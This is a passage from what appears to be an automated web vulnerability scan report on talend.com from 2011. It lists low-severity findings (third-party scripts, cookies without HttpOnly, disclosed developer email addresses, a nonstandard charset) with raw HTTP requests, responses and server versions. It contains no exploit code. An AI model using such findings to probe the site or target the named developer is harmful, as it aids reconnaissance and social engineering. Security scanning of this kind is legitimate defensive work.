Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: src=HomePage; __utma=265980560.152499165.1315242043.1315242043.1315242043.1; __utmb=265980560.5.10.1315242043; __utmc=265980560; __utmz=265980560.1315242043.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:347-IAT-677&token:_mch-talend.com-1315242043519-96990

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 17:02:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Set-Cookie: src=HomepageSpecial; expires=Wed, 05-Oct-2011 17:02:01 GMT; path=/
Connection: close
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 210291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
</script><script type="text/javascript" src="http://static.addtoany.com/menu/page.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://px.owneriq.net/anst/s/talend.js"></script>
...[SNIP]...
</script>

<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

3.5. http://www.talend.com/products-application-integration/matrix.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.talend.com
Path:   /products-application-integration/matrix.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products-application-integration/matrix.php HTTP/1.1
Host: www.talend.com
Proxy-Connection: keep-alive
Referer: http://www.talend.com/download.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: src=HomePage; __utma=265980560.152499165.1315242043.1315242043.1315242043.1; __utmb=265980560.4.10.1315242043; __utmc=265980560; __utmz=265980560.1315242043.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:347-IAT-677&token:_mch-talend.com-1315242043519-96990

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 17:01:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Connection: close
Content-Type: text/html
Content-Length: 39127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
</script><script type="text/javascript" src="http://static.addtoany.com/menu/page.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://px.owneriq.net/anst/s/talend.js"></script>
...[SNIP]...
</script>

<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4. Cookie without HttpOnly flag set  previous  next
There are 2 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



4.1. http://www.talend.com/download_form.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.talend.com
Path:   /download_form.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /download_form.php?cont=mdm&src=HomePage HTTP/1.1
Host: www.talend.com
Proxy-Connection: keep-alive
Referer: http://www.talend.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=265980560.152499165.1315242043.1315242043.1315242043.1; __utmb=265980560.1.10.1315242043; __utmc=265980560; __utmz=265980560.1315242043.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:347-IAT-677&token:_mch-talend.com-1315242043519-96990

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 17:01:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Set-Cookie: src=HomePage; expires=Wed, 05-Oct-2011 17:01:03 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 12333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...

4.2. http://www.talend.com/library/reflibrary.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.talend.com
Path:   /library/reflibrary.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /library/reflibrary.php?src=HomepageSpecial HTTP/1.1
Host: www.talend.com
Proxy-Connection: keep-alive
Referer: http://www.talend.com/products-application-integration/matrix.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: src=HomePage; __utma=265980560.152499165.1315242043.1315242043.1315242043.1; __utmb=265980560.5.10.1315242043; __utmc=265980560; __utmz=265980560.1315242043.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:347-IAT-677&token:_mch-talend.com-1315242043519-96990

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 17:02:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Set-Cookie: src=HomepageSpecial; expires=Wed, 05-Oct-2011 17:02:01 GMT; path=/
Connection: close
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 210291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...

5. Email addresses disclosed  previous  next
There are 9 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


5.1. http://www.talend.com/css/navlinksV3.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.talend.com
Path:   /css/navlinksV3.css

Issue detail

The following email address was disclosed in the response:

Request

GET /css/navlinksV3.css HTTP/1.1
Host: www.talend.com
Proxy-Connection: keep-alive
Referer: http://www.talend.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 17:00:05 GMT
Server: Apache
Last-Modified: Mon, 27 Dec 2010 20:45:11 GMT
ETag: "e7471c-1f95-698323c0"
Accept-Ranges: bytes
Content-Length: 8085
Connection: close
Content-Type: text/css

/*****************************************
Talend : Open Data Solutions
All Rights Reserved . 2007
Made BY D.WASSIM
Contacts : wdammak@talend.com
Nov 2007
******************************************/

/* font tag overwrite */
font{font-size:12px !important;font-family:Arial,Helvetica,FreeSans,"Luxi-sans","Nimbus Sans L",sans-serif!importa
...[SNIP]...

5.2. http://www.talend.com/css/slideProducts7.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.talend.com
Path:   /css/slideProducts7.css

Issue detail

The following email address was disclosed in the response:

Request

GET /css/slideProducts7.css HTTP/1.1
Host: www.talend.com
Proxy-Connection: keep-alive
Referer: http://www.talend.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 17:00:06 GMT
Server: Apache
Last-Modified: Mon, 14 Feb 2011 17:08:03 GMT
ETag: "2cc029-14b8-173502c0"
Accept-Ranges: bytes
Content-Length: 5304
Connection: close
Content-Type: text/css

/*****************************************
Talend : Open Data Solutions
All Rights Reserved 2007
Made BY D.WASSIM
Contacts : wdammak@talend.com
Nov 2010
******************************************/

/** Banner Products **/
   div#bannerProducts{
       margin:0;
       padding:0;
       height:262px;
       width:800px;
       border:none;
   }
           
   table.c
...[SNIP]...

5.3. http://www.talend.com/css/talendV5.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.talend.com
Path:   /css/talendV5.css

Issue detail

The following email address was disclosed in the response:

Request

GET /css/talendV5.css HTTP/1.1
Host: www.talend.com
Proxy-Connection: keep-alive
Referer: http://www.talend.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 17:00:05 GMT
Server: Apache
Last-Modified: Fri, 15 Jul 2011 15:44:03 GMT
ETag: "2cc023-50bb-84d656c0"
Accept-Ranges: bytes
Content-Length: 20667
Connection: close
Content-Type: text/css

/*****************************************
Talend : Open Data Solutions
All Rights Reserved 2007
Made BY D.WASSIM
Contacts : wdammak@talend.com
Nov 2007
******************************************/

html, body {margin: 0; padding: 0; height: 100%; border:0}

body {
   margin:0;
   padding:0;
   height:100%;    
   font-family:Arial, Helvetica
...[SNIP]...

5.4. http://www.talend.com/download.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.talend.com
Path:   /download.php

Issue detail

The following email address was disclosed in the response:

Request

GET /download.php HTTP/1.1
Host: www.talend.com
Proxy-Connection: keep-alive
Referer: http://www.talend.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: src=HomePage; __utma=265980560.152499165.1315242043.1315242043.1315242043.1; __utmb=265980560.3.10.1315242043; __utmc=265980560; __utmz=265980560.1315242043.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:347-IAT-677&token:_mch-talend.com-1315242043519-96990

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 17:01:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Connection: close
Content-Type: text/html
Content-Length: 264091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<!-- By Wassim : wdammak@talend.com -->
...[SNIP]...

5.5. http://www.talend.com/download_form.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.talend.com
Path:   /download_form.php

Issue detail

The following email address was disclosed in the response:

Request

GET /download_form.php?cont=mdm&src=HomePage HTTP/1.1
Host: www.talend.com
Proxy-Connection: keep-alive
Referer: http://www.talend.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=265980560.152499165.1315242043.1315242043.1315242043.1; __utmb=265980560.1.10.1315242043; __utmc=265980560; __utmz=265980560.1315242043.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:347-IAT-677&token:_mch-talend.com-1315242043519-96990

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 17:01:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Set-Cookie: src=HomePage; expires=Wed, 05-Oct-2011 17:01:03 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 12333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<!-- By Wassim : wdammak@talend.com -->
...[SNIP]...

5.6. http://www.talend.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.talend.com
Path:   /index.php

Issue detail

The following email address was disclosed in the response:

Request

GET /index.php HTTP/1.1
Host: www.talend.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 17:00:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Connection: close
Content-Type: text/html
Content-Length: 52848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<!-- By Wassim : wdammak@talend.com -->
...[SNIP]...

5.7. http://www.talend.com/js/jquery.colorbox-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.talend.com
Path:   /js/jquery.colorbox-min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/jquery.colorbox-min.js HTTP/1.1
Host: www.talend.com
Proxy-Connection: keep-alive
Referer: http://www.talend.com/download_form.php?cont=mdm&src=HomePage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=265980560.152499165.1315242043.1315242043.1315242043.1; __utmb=265980560.1.10.1315242043; __utmc=265980560; __utmz=265980560.1315242043.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:347-IAT-677&token:_mch-talend.com-1315242043519-96990; src=HomePage

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 17:01:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Cache-Control: must-revalidate
Expires: Mon, 05 Sep 2011 18:01:03 GMT
Vary: Accept-Encoding
Content-Length: 9277
Connection: close
Content-Type: text/javascript; charset: UTF-8

// ColorBox v1.3.16 - a full featured, light-weight, customizable lightbox based on jQuery 1.3+
// Copyright (c) 2011 Jack Moore - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
(function(a,b,c){function ba(b){if(!T){O=b,Z(a.extend(J,a.data(O,e))),x=a(O),P=0,J.rel!=="nofollow"&&(x=a("."+V)
...[SNIP]...

5.8. http://www.talend.com/library/reflibrary.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.talend.com
Path:   /library/reflibrary.php

Issue detail

The following email address was disclosed in the response:

Request

GET /library/reflibrary.php?src=HomepageSpecial HTTP/1.1
Host: www.talend.com
Proxy-Connection: keep-alive
Referer: http://www.talend.com/products-application-integration/matrix.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: src=HomePage; __utma=265980560.152499165.1315242043.1315242043.1315242043.1; __utmb=265980560.5.10.1315242043; __utmc=265980560; __utmz=265980560.1315242043.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:347-IAT-677&token:_mch-talend.com-1315242043519-96990

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 17:02:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Set-Cookie: src=HomepageSpecial; expires=Wed, 05-Oct-2011 17:02:01 GMT; path=/
Connection: close
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 210291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<!-- By Wassim : wdammak@talend.com -->
...[SNIP]...

5.9. http://www.talend.com/products-application-integration/matrix.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.talend.com
Path:   /products-application-integration/matrix.php

Issue detail

The following email address was disclosed in the response:

Request

GET /products-application-integration/matrix.php HTTP/1.1
Host: www.talend.com
Proxy-Connection: keep-alive
Referer: http://www.talend.com/download.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: src=HomePage; __utma=265980560.152499165.1315242043.1315242043.1315242043.1; __utmb=265980560.4.10.1315242043; __utmc=265980560; __utmz=265980560.1315242043.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:347-IAT-677&token:_mch-talend.com-1315242043519-96990

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 17:01:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Connection: close
Content-Type: text/html
Content-Length: 39127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<!-- By Wassim : wdammak@talend.com -->
...[SNIP]...

6. HTML uses unrecognised charset  previous
There are 2 instances of this issue:

Issue background

Applications may specify a non-standard character set as a result of typographical errors within the code base, or because of intentional usage of an unusual character set that is not universally recognised by browsers. If the browser does not recognise the character set specified by the application, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


6.1. http://www.talend.com/download.php  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.talend.com
Path:   /download.php

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /download.php HTTP/1.1
Host: www.talend.com
Proxy-Connection: keep-alive
Referer: http://www.talend.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: src=HomePage; __utma=265980560.152499165.1315242043.1315242043.1315242043.1; __utmb=265980560.3.10.1315242043; __utmc=265980560; __utmz=265980560.1315242043.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:347-IAT-677&token:_mch-talend.com-1315242043519-96990

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 17:01:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Connection: close
Content-Type: text/html
Content-Length: 264091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<!-- By Wassim : wdammak@talend.com-->
   <meta http-equiv="Content-Type" content="text/html;charset=utf8" />
   
   <title>
...[SNIP]...

6.2. http://www.talend.com/library/reflibrary.php  previous

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.talend.com
Path:   /library/reflibrary.php

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /library/reflibrary.php?src=HomepageSpecial HTTP/1.1
Host: www.talend.com
Proxy-Connection: keep-alive
Referer: http://www.talend.com/products-application-integration/matrix.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: src=HomePage; __utma=265980560.152499165.1315242043.1315242043.1315242043.1; __utmb=265980560.5.10.1315242043; __utmc=265980560; __utmz=265980560.1315242043.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:347-IAT-677&token:_mch-talend.com-1315242043519-96990

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 17:02:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Set-Cookie: src=HomepageSpecial; expires=Wed, 05-Oct-2011 17:02:01 GMT; path=/
Connection: close
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 210291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<!-- By Wassim : wdammak@talend.com-->
   <meta http-equiv="Content-Type" content="text/html;charset=utf8" />
   
   <title>
...[SNIP]...

Report generated by XSS.CX at Mon Sep 05 11:04:46 GMT-06:00 2011.